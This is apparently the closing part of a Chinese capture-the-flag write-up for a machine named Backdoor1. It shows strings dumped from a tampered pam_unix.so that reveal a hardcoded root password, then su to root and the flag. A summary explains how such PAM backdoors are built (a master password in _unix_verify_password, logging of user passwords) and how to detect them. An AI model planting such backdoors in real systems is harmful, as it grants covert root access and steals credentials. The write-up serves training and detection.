Cannot send password to helper: %m
%d more authentication failure%s; logname=%s uid=%d euid=%d tty=%s ruser=%s rhost=%s %s%s
service(%s) ignoring max retries; %d > %d
option remember not allowed for this module type
option minlen not allowed for this module type
option rounds not allowed for this module type
Password minlen reset to 8 characters
unrecognized ENCRYPT_METHOD value [%s]
authentication failure; logname=%s uid=%d euid=%d tty=%s ruser=%s rhost=%s %s%s
no memory for failure recorder
/dev/urandom
*NP*
$2a$
rounds=%u$
/etc/security/nopasswd
%s:%s:%d:%s
%s:%s:%d:%s,%s
%s:%lu:1:%s
/etc/npasswd
password changed for %s
/etc/nshadow
/etc/shadow
account %s has password changed in future
Algo %s not supported by the crypto backend, falling back to MD5
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789./
./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
;*3$"
GCC: (Debian 10.2.1-6) 10.2.1 20210110
|!3)
|%rc
        3       -
        4       -
        8       -
        9       -
        :       -
 low
"key
 low
(pwd
~20'
 $0.(
;pwd
;err
(buf
;len
><D
Cerr
"pwd
'new
'old
"tty
9% 1
"pwd
"fds
'len
!nis
!nis
!ret
"buf
~"len
!err
P"tty
5val
;key
=buf
?=tmp
;__n
~$len
0pwd
0pwd
0pwd
 $,(
 $,(
/usr/include
bigcrypt.c
crypt.h
stdlib.h
string.h
<built-in>
/usr/lib/gcc/x86_64-linux-gnu/10/include
/usr/include/x86_64-linux-gnu/bits
/usr/include/x86_64-linux-gnu/bits/types
/usr/include
../../libpam/include/security
/usr/include/x86_64-linux-gnu/sys
pam_unix_acct.c
stddef.h
types.h
__sigset_t.h
struct_FILE.h
FILE.h
pwd.h
shadow.h
__sigval_t.h
siginfo_t.h
signal.h
sigaction.h
_pam_types.h
support.h
stdio.h
pam_modules.h
passverify.h
unistd.h
pam_ext.h
libintl.h
pam_modutil.h
errno.h
wait.h
<built-in>
../../libpam/include/security
/usr/include
/usr/include/x86_64-linux-gnu/sys
pam_unix_auth.c
support.h
_pam_types.h
pam_modules.h
stdlib.h
pam_ext.h
syslog.h
/usr/lib/gcc/x86_64-linux-gnu/10/include
/usr/include/x86_64-linux-gnu/bits
/usr/include/x86_64-linux-gnu/bits/types
/usr/include/x86_64-linux-gnu/sys
/usr/include
../../libpam/include/security
/usr/include/rpc
/usr/include/netinet
/usr/include/rpcsvc
pam_unix_passwd.c
stddef.h
types.h
struct_FILE.h
FILE.h
types.h
stdint-intn.h
struct_timeval.h
pwd.h
shadow.h
_pam_types.h
support.h
types.h
stdint-uintn.h
sockaddr.h
socket.h
in.h
un.h
xdr.h
auth.h
clnt.h
yppasswd.h
pam_ext.h
ypclnt.h
passverify.h
string.h
malloc.h
libintl.h
pam_modules.h
md5.h
stdio.h
../../libpam/include/security
/usr/include
pam_unix_sess.c
support.h
_pam_types.h
pam_ext.h
pam_modutil.h
unistd.h
/usr/include/x86_64-linux-gnu/bits
/usr/include
/usr/lib/gcc/x86_64-linux-gnu/10/include
/usr/include/x86_64-linux-gnu/sys
/usr/include/x86_64-linux-gnu/bits/types
../../libpam/include/security
/usr/include/rpcsvc
support.c
stdio.h
stdlib.h
stddef.h
types.h
types.h
__sigset_t.h
struct_FILE.h
FILE.h
pwd.h
__sigval_t.h
siginfo_t.h
signal.h
sigaction.h
_pam_types.h
support.h
pam_ext.h
pam_modutil.h
string.h
unistd.h
pam_modules.h
malloc.h
passverify.h
errno.h
wait.h
stdio.h
ctype.h
ypclnt.h
<built-in>
strings.h
[Y;YYWYYWYYWY
/usr/include/x86_64-linux-gnu/sys
/usr/lib/gcc/x86_64-linux-gnu/10/include
/usr/include/x86_64-linux-gnu/bits
/usr/include/x86_64-linux-gnu/bits/types
../../libpam/include/security
/usr/include
passverify.c
stat.h
stddef.h
types.h
struct_timeval.h
struct_timespec.h
_pam_types.h
pwd.h
FILE.h
struct_FILE.h
support.h
shadow.h
time.h
stat.h
crypt.h
md5.h
stdio.h
unistd.h
string.h
time.h
pam_ext.h
stdlib.h
pam_modutil.h
bigcrypt.h
<built-in>
fcntl.h
errno.h
/X ..
X  ..
[  ..
= J.
<  X
f...
/usr/include/rpc
/usr/include/x86_64-linux-gnu/bits
/usr/include/x86_64-linux-gnu/sys
/usr/include/netinet
yppasswd_xdr.c
types.h
types.h
types.h
stdint-intn.h
stdint-uintn.h
sockaddr.h
socket.h
in.h
un.h
xdr.h
yppasswd.h
/usr/include
md5.c
md5_crypt.c
md5.h
stdlib.h
string.h
<built-in>
r/;<
u;=I
==H<
0:/;=I<
18=-
uI=;
ue=-
Jtu-
ftu-
K-=-
Jtu-
ftu-
K-=-
K-=-
Jtu-
ftu-
ftu-
Jtu-
.V>,
.K-=-
fu-=-
/-/-Ju.I<
.W=-
0,0,.
.W=-
.W=-
0:0:.
:/=:<
yJ.K
        ?/KH
/usr/include
md5.c
md5_crypt.c
md5.h
stdlib.h
string.h
<built-in>
r/;<
u;=I
==H<
0:/;=I<
18=-
uI=;
ue=-
Jtu-
ftu-
K-=-
Jtu-
ftu-
K-=-
K-=-
Jtu-
ftu-
ftu-
Jtu-
.V>,
.K-=-
fu-=-
/-/-Ju.I<
.W=-
0,0,.
.W=-
.W=-
0:0:.
:/=:<
yJ.K
        ?/KH
internal
bigcrypt
crypt_data
short unsigned int
cipher_ptr
__xx__
tmp_ptr
unsigned char
input
initialized
bigcrypt.c
setting
strncpy
plaintext_ptr
crypt_r
GNU C17 10.2.1 20210110 -mtune=generic -march=x86-64 -g -O2 -fPIC -fasynchronous-unwind-tables
long long unsigned int
dec_c2_cryptbuf
__builtin_calloc
long long int
keybuf
/root/Linux-PAM-1.3.1/modules/pam_unix
short int
keylen
output
n_seg
cdata
salt_ptr
malloc
__off_t
__gid_t
_IO_read_ptr
_pkey
_chain
void_uname
__sigval_t
si_errno
_shortbuf
_make_remark
is_hash_algo
sa_flags
_IO_read_base
__sighandler_t
_lower
si_stime
pipe
_arch
pw_shell
_exit
dup2
pamh
_fileno
_IO_read_end
_sigchld
authrv
_IO_backup_base
__isoc99_sscanf
execve
envp
_cur_column
_upper
si_overrun
_IO_codecvt
sp_inact
_bounds
si_addr
sp_max
_old_offset
sp_min
si_addr_lsb
si_sigval
sp_flag
newsa
geteuid
__off64_t
pam_unix_acct.c
si_pid
pam_modutil_redirect_fd
_IO_marker
_freeres_buf
PAM_MODUTIL_IGNORE_FD
__val
si_utime
get_account_info
_IO_write_ptr
__sigset_t
waitpid
fork
si_uid
_pad
siginfo_t
_IO_save_base
sival_int
sp_expire
pam_modutil_sanitize_helper_fds
_lock
_sigsys
_flags2
__builtin_puts
stdout
pw_passwd
_syscall
pam_sm_acct_mgmt
unix_args
pw_gid
_sigpoll
_sifields
pam_get_data
_IO_write_end
PAM_MODUTIL_PIPE_FD
_IO_lock_t
_IO_FILE
setuid
oldsa
si_tid
__clock_t
UNIX_Ctrls
pam_get_item
dcngettext
sp_pwdp
PAM_MODUTIL_NULL_FD
token
fflush
_markers
pw_dir
_sigfault
sp_warn
pam_handle_t
_IO_buf_end
_addr_bnd
__pid_t
_call_addr
pw_gecos
_vtable_offset
pretval
dcgettext
spwd
si_status
argc
__errno_location
__uint32_t
check_shadow_expiry
__uid_t
__sigaction_handler
si_signo
_kill
_IO_save_end
sa_sigaction
sa_mask
daysleft
__pad0
__pad5
snprintf
sp_lstchg
_unused2
sa_restorer
pw_name
_unix_run_verify_binary
pam_handle
_set_ctrl
getuid
pam_modutil_read
_timer
si_fd
pam_syslog
pw_uid
sa_handler
_freeres_list
sival_ptr
_IO_wide_data
si_band
argv
_IO_write_base
_IO_buf_base
sp_namp
child
si_code
ret_data
pam_sm_setcred
_unix_verify_password
_unix_blankpasswd
pam_set_data
pam_get_authtok
setcred_free
pam_get_user
pam_sm_authenticate
pam_unix_auth.c
pass_old
AUTH_REJECTEDCRED
XDR_DECODE
sockaddr_ax25
sin6_flowinfo
RPC_CANTDECODEARGS
fclose
RE_why
lctrl
RE_lb
xdrproc_t
strncmp
_do_setpass
ah_ops
RPC_RPCBFAILURE
sptr
sockaddr
sin6_scope_id
high
sockaddr_ns
clnt_sperrno
RPC_CANTDECODERES
pam_sm_chauthtok
__int32_t
xdr_op
md5pass
ah_verf
IPPROTO_IGMP
IPPORT_TFTP
pam_unix_passwd.c
IPPORT_USERRESERVED
IPPORT_NAMESERVER
RPC_PROGNOTREGISTERED
IPPORT_SYSTAT
cl_freeres
x_getint32
__u6_addr16
__caddr_t
IPPROTO_SCTP
IPPROTO_IP
auth_ops
sockaddr_ipx
ah_nextverf
newpass
IPPORT_WHOIS
getNISserver
IPPORT_CMDSERVER
IPPORT_FTP
in_addr_t
Goodcrypt_md5
IPPROTO_ESP
_unix_getpwnam
x_getpostn
IPPROTO_EGP
sockaddr_at
RPC_INTR
ah_refresh
IPPROTO_IPV6
__u6_addr8
RPC_INPROGRESS
clnt_ops
CLIENT
IPPORT_FINGER
AUTH_BADVERF
_unix_comesfromsource
IPPORT_WHOSERVER
unlock_pwdf
__uint16_t
IPPROTO_MAX
RPC_CANTSEND
oa_length
x_getbytes
RPC_SUCCESS
in_port_t
RPC_VERSMISMATCH
IPPORT_RJE
IPPORT_BIFFUDP
strtok_r
RPC_SYSTEMERROR
re_status
sin_zero
x_destroy
RPC_UNKNOWNADDR
IPPORT_SMTP
s_addr
cl_geterr
x_ops
sa_family_t
cl_private
s_luser
cl_call
bool_t
IPPROTO_BEETPH
RPC_TIMEDOUT
pam_set_item
x_putint32
sockaddr_inarp
enum_t
oa_flavor
sin_family
tv_usec
__u_long
AUTH_OK
sockaddr_iso
AUTH
IPPROTO_UDP
XDR_FREE
s_npas
x_public
RE_errno
yperr_string
remember
opaque_auth
rounds
cl_ops
IPPROTO_IPIP
IPPORT_LOGINSERVER
x_putlong
IPPORT_ROUTESERVER
unix_update_passwd
ah_cred
RPC_TLIERROR
towhat
x_inline
forwho
IPPORT_DISCARD
x_putbytes
s_pas
ah_marshal
IPPORT_ECHO
cl_abort
xdr_ops
RPC_PROGUNAVAIL
opwfile
IPPROTO_PUP
check_old_password
XDR_ENCODE
sin_port
IPPROTO_AH
sockaddr_eon
authunix_create_default
IPPROTO_ICMP
unlocked
__u6_addr32
sockaddr_un
create_password_hash
newpw
yp_get_default_domain
RPC_STALERACHANDLE
__in6_u
sin_addr
ah_validate
RPC_FAILED
RE_vers
cl_destroy
fopen
AUTH_BADCRED
save_old_password
done
IPPROTO_IDP
x_setpostn
fgets
timeval
yppwd
long double
oldpass
AUTH_FAILED
sin6_port
IPPORT_NETSTAT
IPPROTO_RSVP
IPPROTO_GRE
x_base
IPPORT_EXECSERVER
AUTH_REJECTEDVERF
yp_master
IPPORT_TTYLINK
sin6_family
_pam_unix_approve_pass
sockaddr_dl
oa_base
IPPORT_TELNET
RPC_UNKNOWNHOST
RPC_UNKNOWNPROTO
IPPROTO_PIM
sun_family
ah_private
RPC_PROGVERSMISMATCH
RPC_CANTENCODEARGS
sun_path
sockaddr_in
auth_stat
__uint8_t
_unix_verify_shadow
IPPROTO_MTP
x_getlong
IPPROTO_TP
x_op
fromwhat
tv_sec
pass_min_len
IPPORT_DAYTIME
AUTH_TOOWEAK
IPPROTO_UDPLITE
cl_control
IPPROTO_COMP
IPPROTO_ENCAP
RPC_NOBROADCAST
rpc_err
unix_update_shadow
cl_auth
timeout
RPC_N2AXLATEFAILURE
domainname
clnt
ah_key
__suseconds_t
IPPORT_SUPDUP
__time_t
des_block
IPPORT_EFSSERVER
IPPORT_TIMESERVER
clnt_create
clnt_stat
IPPROTO_TCP
strcmp
IPPORT_RESERVED
sa_family
strdup
getrpcport
IPPROTO_MPLS
pass_new
RPC_UDERROR
x_private
__u_int
pam_prompt
x_handy
s_uid
IPPORT_MTP
ah_destroy
sockaddr_in6
IPPROTO_DCCP
sa_data
is_pwd_shadowed
sin6_addr
IPPROTO_RAW
sockaddr_x25
retry
AUTH_INVALIDRESP
RPC_CANTRECV
RPC_PROCUNAVAIL
RPC_AUTHERROR
pam_modutil_getlogin
pam_unix_sess.c
login_name
service
user_name
pam_sm_open_session
pam_sm_close_session
__stream
quiet
yp_match
_ISgraph
_pam_failed_auth
__ssize_t
write
__lineptr
type
strcasecmp
_unix_cleanup
atoi
__nptr
__builtin_memset
_ISprint
get_pwd_hash
_cleanup_failures
failure
spasswd
matched
yp_bind
strsep
filename
__builtin_memcpy
_ISpunct
suid
userlen
verify_pwd_hash
strcpy
_ISxdigit
_ISupper
__ctype_b_loc
_IScntrl
support.c
void_old
count
buflen
shome
feof
search_key
_ISalpha
_ISblank
_ISalnum
slogin
pam_fail_delay
_ISspace
sgid
getline
userinfo
_ISlower
strtol
__getdelim
sgecos
_unix_run_helper_binary
yp_unbind
ruser
data_name
sshell
strncasecmp
_ISdigit
files
rhost
error_status
__glibc_reserved
st_ctim
unlink
st_blksize
st_blocks
MD5Context
uint32
crypted
st_mtim
found
curdays
__dev_t
result
where
usleep
strip_hpux_aging
spwdent
nbuf
umask
__blksize_t
st_uid
crypt_make_salt
st_rdev
GoodMD5Update
__syscall_slong_t
algoid
ulckpwdf
timezone
__mode_t
fchown
st_gid
putspent
howmany
stpcpy
st_size
getpid
clock
fstat
__blkcnt_t
tz_minuteswest
__ino_t
const_charp
tmppass
unix_selinux_confined
crypt_md5_wrapper
__builtin_strchr
bits
__fd
pam_modutil_getspnam
pam_modutil_getpwnam
rename
nullok
__fxstat
oldmask
st_nlink
GoodMD5Final
passverify.c
st_dev
timespec
fchmod
gettimeofday
assigned_passwd
i64c
fputs
fgetspent
fgetpwent
tv_nsec
valid
stmpent
GoodMD5Init
st_mode
putpwent
fsync
tz_dsttime
Brokencrypt_md5
hash_len
st_ino
__statbuf
MD5_CTX
__nlink_t
st_atim
wroteentry
xdr_yppasswd
xdr_int
yppasswd_xdr.c
xdrs
xdr_string
objp
xdr_xpasswd
longs
md5_good.c
final
to64
ctx1
strncat
__builtin_strlen
byteReverse
itoa64
GoodMD5Transform
digest
magic
BrokenMD5Update
BrokenMD5Final
BrokenMD5Transform
md5_broken.c
BrokenMD5Init
 $-(
Q@I$
Q@I$
Q@J$
Q@J$
# %!
# %!x
# %!
# %!"
# %!
# %!x
# %!
# %!"
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
bigcrypt.c
pam_unix_acct.c
envp.0
pam_unix_auth.c
setcred_free
pam_unix_passwd.c
_unix_verify_shadow
_pam_unix_approve_pass
pam_unix_sess.c
support.c
_unix_cleanup
_unix_run_helper_binary
_cleanup_failures
search_key.constprop.0
unix_args
passverify.c
crypt_make_salt
valid.2
buf.1
nbuf.0
yppasswd_xdr.c
md5_good.c
itoa64
md5_broken.c
__FRAME_END__
xdr_yppasswd
_unix_run_verify_binary
_set_ctrl
BrokenMD5Transform
get_account_info
Goodcrypt_md5
BrokenMD5Init
bigcrypt
_fini
save_old_password
crypt_md5_wrapper
unix_update_passwd
unix_update_shadow
create_password_hash
Brokencrypt_md5
__dso_handle
_unix_getpwnam
GoodMD5Final
_unix_comesfromsource
GoodMD5Transform
_make_remark
_DYNAMIC
is_pwd_shadowed
unlock_pwdf
BrokenMD5Final
unix_selinux_confined
GoodMD5Init
get_pwd_hash
check_shadow_expiry
__GNU_EH_FRAME_HDR
__TMC_END__
_GLOBAL_OFFSET_TABLE_
GoodMD5Update
_unix_blankpasswd
_unix_verify_password
verify_pwd_hash
_init
BrokenMD5Update
xdr_xpasswd
pam_modutil_sanitize_helper_fds@LIBPAM_MODUTIL_1.1.9
free@GLIBC_2.2.5
pam_modutil_getpwnam@LIBPAM_MODUTIL_1.0
strcasecmp@GLIBC_2.2.5
__errno_location@GLIBC_2.2.5
unlink@GLIBC_2.2.5
strncpy@GLIBC_2.2.5
strncmp@GLIBC_2.2.5
_ITM_deregisterTMCloneTable
stdout@GLIBC_2.2.5
_exit@GLIBC_2.2.5
strcpy@GLIBC_2.2.5
pam_set_item@LIBPAM_1.0
pam_get_data@LIBPAM_1.0
putspent@GLIBC_2.2.5
sigaction@GLIBC_2.2.5
pam_sm_setcred
pam_prompt@LIBPAM_EXTENSION_1.0
write@GLIBC_2.2.5
getpid@GLIBC_2.2.5
clock@GLIBC_2.2.5
yp_unbind@LIBNSL_1.0
fclose@GLIBC_2.2.5
stpcpy@GLIBC_2.2.5
yp_master@LIBNSL_1.0
dcgettext@GLIBC_2.2.5
strlen@GLIBC_2.2.5
getuid@GLIBC_2.2.5
dup2@GLIBC_2.2.5
strchr@GLIBC_2.2.5
snprintf@GLIBC_2.2.5
gettimeofday@GLIBC_2.2.5
fputs@GLIBC_2.2.5
memset@GLIBC_2.2.5
geteuid@GLIBC_2.2.5
pam_modutil_getlogin@LIBPAM_MODUTIL_1.0
strncat@GLIBC_2.2.5
authunix_create_default@GLIBC_2.2.5
pipe@GLIBC_2.2.5
yp_match@LIBNSL_1.0
strtok_r@GLIBC_2.2.5
pam_sm_chauthtok
read@GLIBC_2.2.5
fgets@GLIBC_2.2.5
execve@GLIBC_2.2.5
xdr_string@GLIBC_2.2.5
calloc@GLIBC_2.2.5
pam_sm_close_session
__getdelim@GLIBC_2.2.5
strcmp@GLIBC_2.2.5
getpwnam@GLIBC_2.2.5
feof@GLIBC_2.2.5
__gmon_start__
umask@GLIBC_2.2.5
strtol@GLIBC_2.2.5
memcpy@GLIBC_2.14
time@GLIBC_2.2.5
fileno@GLIBC_2.2.5
malloc@GLIBC_2.2.5
strncasecmp@GLIBC_2.2.5
fflush@GLIBC_2.2.5
pam_sm_acct_mgmt
strsep@GLIBC_2.2.5
__isoc99_sscanf@GLIBC_2.7
fgetpwent@GLIBC_2.2.5
syslog@GLIBC_2.2.5
__fxstat@GLIBC_2.2.5
yp_bind@LIBNSL_1.0
xdr_int@GLIBC_2.2.5
fgetspent@GLIBC_2.2.5
crypt_r@XCRYPT_2.0
yperr_string@LIBNSL_1.0
clnt_sperrno@GLIBC_2.2.5
fchmod@GLIBC_2.2.5
pam_syslog@LIBPAM_EXTENSION_1.0
fsync@GLIBC_2.2.5
pam_sm_open_session
waitpid@GLIBC_2.2.5
clnt_create@GLIBC_2.2.5
fchown@GLIBC_2.2.5
fopen@GLIBC_2.2.5
ulckpwdf@GLIBC_2.2.5
pam_get_item@LIBPAM_1.0
dcngettext@GLIBC_2.2.5
rename@GLIBC_2.2.5
pam_set_data@LIBPAM_1.0
pam_modutil_read@LIBPAM_MODUTIL_1.0
pam_get_user@LIBPAM_1.0
pam_modutil_getspnam@LIBPAM_MODUTIL_1.0
pam_sm_authenticate
yp_get_default_domain@LIBNSL_1.0
pam_fail_delay@LIBPAM_1.0
_ITM_registerTMCloneTable
setuid@GLIBC_2.2.5
strdup@GLIBC_2.2.5
putpwent@GLIBC_2.2.5
pam_get_authtok@LIBPAM_EXTENSION_1.1
__cxa_finalize@GLIBC_2.2.5
fork@GLIBC_2.2.5
getrpcport@GLIBC_2.2.5
__ctype_b_loc@GLIBC_2.3
usleep@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.data.rel.ro
.dynamic
.got.plt
.data
.bss
.comment
.debug_aranges
.debug_info
.debug_abbrev
.debug_line
.debug_str
.debug_loc
.debug_ranges
morri@Backdoor1:~$ 

找到特别的地方，root密码为660930334

pam_unix_auth: cannot allocate ret_data
auth could not identify password for [%s]
PAM: Root access granted via backdoor
bad username [%s]
660930334
No password supplied
Password unchanged

3、获取ROOT权限

morri@Backdoor1:~$ su root
Password: 
root@Backdoor1:/home/morri# id
uid=0(root) gid=0(root) groups=0(root)

ROOT FLAG

root@Backdoor1:~# cat root.txt 
flag{root-5d363bb914c59fd1cd2b59e998bedb4f}

【总结】

1、FUFF测试

https://github.com/ffuf/ffuf

2、查看修改过的文件

find / -type f -newermt "2025-07-05" ! -newermt "2025-07-10" ! -path '/proc/*' ! -path '/sys/*' ! -path '/run/*' 2>/dev/null

3、pam_unix.so包

Linux中的pam_unix.so是PAM（可插拔认证模块）的核心模块之一，主要用于传统Unix系统的身份认证。以下是其功能、配置、安全风险及后门技术的综合分析：
Linux中的pam_unix.so是PAM（可插拔认证模块）的核心模块之一，主要用于传统Unix系统的身份认证。以下是其功能、配置、安全风险及后门技术的综合分析：
一、核心功能与作用

1. 密码认证
   • 通过比对用户输入的密码与/etc/shadow中的加密密码实现身份验证。
   • 支持多种加密算法（如MD5、SHA256、SHA512），可通过参数md5、sha256等指定。
2. 账户管理
   • 检查用户账户有效性（如是否过期、是否允许登录）。
   • 控制用户登录权限（如禁止root通过SSH登录）。
3. 会话与进程权限
   • 设置用户会话的默认权限（如umask值）。
   • 限制普通用户执行敏感操作。

二、配置与参数

1. 配置文件位置
   • 通常位于/etc/pam.d/目录下（如system-auth、sshd等文件）。
2. 关键参数
   • 控制标记：
     • required：必须通过认证，但失败不影响后续模块执行。
     • requisite：失败立即终止流程。
     • sufficient：成功则跳过后续模块。
     • optional：认证可跳过。
   • 功能参数：
     • shadow：从/etc/shadow读取密码。
     • nullok：允许空密码（生产环境建议禁用）。
     • audit：记录认证日志到syslog

三、安全风险与后门技术

1. 已知风险
   • 弱密码策略：默认仅依赖密码复杂度，易受暴力破解攻击。
   • 配置文件篡改：若/etc/pam.d/下的配置被修改，可能导致未授权访问。
2. 后门实现方法
   • 源码修改：
     • 在_unix_verify_password函数中插入万能密码（如strcmp(p, "0xMitsurugi")），绕过正常认证。
     • 编译后替换系统原文件（/lib64/security/pam_unix.so），需关闭SELinux或调整文件上下文。
   • 日志记录：
     • 修改代码记录用户密码到指定文件（如/tmp/pslog），用于后续窃取。
3. 检测方法
   • 文件校验：检查pam_unix.so的修改时间、MD5校验和，对比官方版本。
   • 行为监控：通过strace跟踪模块调用，观察异常密码校验逻辑。
   • 日志审计：检查/var/log/secure中是否存在非常规认证记录。